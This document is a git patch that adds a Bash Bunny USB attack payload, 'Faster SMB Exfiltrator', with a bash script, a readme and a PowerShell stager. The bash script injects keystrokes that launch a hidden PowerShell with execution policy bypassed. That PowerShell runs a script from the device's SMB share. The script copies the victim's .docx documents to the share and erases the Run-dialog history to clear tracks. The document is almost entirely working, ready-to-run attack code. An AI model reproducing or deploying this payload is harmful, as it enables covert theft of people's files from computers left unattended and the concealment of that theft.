From 02d0358ccbbfc6761b02cd1a0a8ea48ab6ceed93 Mon Sep 17 00:00:00 2001 From: Darren Kitchen Date: Tue, 28 Mar 2017 20:10:01 +0700 Subject: [PATCH] Add faster SMB Exfiltrator payload --- .../faster_smb_exfiltrator/payload.txt | 93 +++++++++++++++++++ .../library/faster_smb_exfiltrator/readme.md | 37 ++++++++ payloads/library/faster_smb_exfiltrator/s.ps1 | 7 ++ 3 files changed, 137 insertions(+) create mode 100644 payloads/library/faster_smb_exfiltrator/payload.txt create mode 100644 payloads/library/faster_smb_exfiltrator/readme.md create mode 100644 payloads/library/faster_smb_exfiltrator/s.ps1 diff --git a/payloads/library/faster_smb_exfiltrator/payload.txt b/payloads/library/faster_smb_exfiltrator/payload.txt new file mode 100644 index 0000000..76479fa --- /dev/null +++ b/payloads/library/faster_smb_exfiltrator/payload.txt @@ -0,0 +1,93 @@ +#!/bin/bash +# +# Title: Faster SMB Exfiltrator +# Author: Hak5Darren +# Props: ImNatho, mike111b, madbuda +# Version: 1.0 +# Category: Exfiltration +# Target: Windows XP SP3+ (Powershell) +# Attackmodes: HID, Ethernet +# +# Rewrite of the original SMB Exfiltrator payload with: +# - Faster copying, using robocopy multithreaded mode +# - Faster finish, using a EXFILTRATION_COMPLETE file +# - Offload logic to target PC for accurate date/time +# - Clears tracks by default without second run dialog +# - Test-Connection handling by ICMP (no lame sleeps) +# - Hidden powershell window by default +# +# LED Status +# Red Blinking.........Failed to find dependencies +# Purple Blinking......HID Stage +# Purple...............Ethernet Stage +# Blue/Purple..........Receiving Files +# White................Moving Liberated Files +# Green................Finished +# +# OPTIONS: configured from s.ps1 + + + +######## INITIALIZATION ######## +# Check for impacket. If not found, blink fast red. +if [ ! -d /pentest/impacket/ ]; then + LED R 100 + exit 1 +fi + + + +######## SETUP ######## +# Get switch position from bunny helpers +source bunny_helpers.sh +# Make temporary loot directory +mkdir -p /loot/smb/ +# Delete any old exfiltration data +rm -rf /loot/smb/* +# Copy new powershell payload to smb share +cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/ +# Make loot directory on USB Disk +mkdir -p /root/udisk/loot/smb_exfiltrator +# Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+) +echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all + + + +######## HID STAGE ######## +# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available +LED R B 500 +ATTACKMODE HID +QUACK GUI r +QUACK DELAY 500 +QUACK STRING "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\s\s.ps1; exit } }\"" +QUACK ENTER + + + +######## ETHERNET STAGE ######## +LED R B +ATTACKMODE RNDIS_ETHERNET +# Start the SMB Server +/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' s /loot/smb >> /loot/smbserver.log & +# Re-enable ICMP/echo replies to trip the powershell stager +echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all +# Wait until files are done copying. +while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do LED B; sleep 0.5; LED R B; sleep 0.5; done + + + +######## CLEANUP ######## +LED R G B +# Delete EXFILTRATION_COMPLETE file +rm -rf /loot/smb/EXFILTRATION_COMPLETE +# Move files to udisk loot directory +mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator +# Clean up temporary loot directory +rm -rf /loot/smb/e/* +# Sync file system +sync; sleep 1; sync + + + +######## FINISH ######## +LED G # Trap is clean \ No newline at end of file diff --git a/payloads/library/faster_smb_exfiltrator/readme.md b/payloads/library/faster_smb_exfiltrator/readme.md new file mode 100644 index 0000000..34529a9 --- /dev/null +++ b/payloads/library/faster_smb_exfiltrator/readme.md @@ -0,0 +1,37 @@ +# Faster SMB Exfiltrator + +* Author: Hak5Darren +* Props: ImNatho, mike111b, madbuda +* Version: Version 1.0 +* Target: Windows XP SP3+ (Powershell) +* Category: Exfiltration +* Attackmodes: HID, Ethernet + +## Description + +Exfiltrates select files from users's documents folder via SMB. +Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME + +Rewrite of the original SMB Exfiltrator payload with: +* Faster copying, using robocopy multithreaded mode +* Faster finish, using a EXFILTRATION_COMPLETE file +* Offload logic to target PC for accurate date/time +* Clears tracks by default without second run dialog +* Test-Connection handling by ICMP (no lame sleeps) +* Hidden powershell window by default + + +## Configuration + +Configured to copy docx files by default. Change $exfil_ext in s.ps1 to desired. + +## STATUS + +| LED | Status | +| ------------------- | -------------------------------------- | +| Red (blinking) | Impacket not found in /pentest | +| Magenta (blinking) | HID Stage | +| Magenta | Ethernet Stage | +| Magenta/Blue | Receiving files | +| White | Moving liberated files to mass storage | +| Green | Finished | \ No newline at end of file diff --git a/payloads/library/faster_smb_exfiltrator/s.ps1 b/payloads/library/faster_smb_exfiltrator/s.ps1 new file mode 100644 index 0000000..f1012b6 --- /dev/null +++ b/payloads/library/faster_smb_exfiltrator/s.ps1 @@ -0,0 +1,7 @@ +$exfil_dir="$Env:UserProfile\Documents" +$exfil_ext="*.docx" +$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))" +mkdir $loot_dir +robocopy $exfil_dir $loot_dir $exfil_ext /S /MT /Z +New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE" +Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue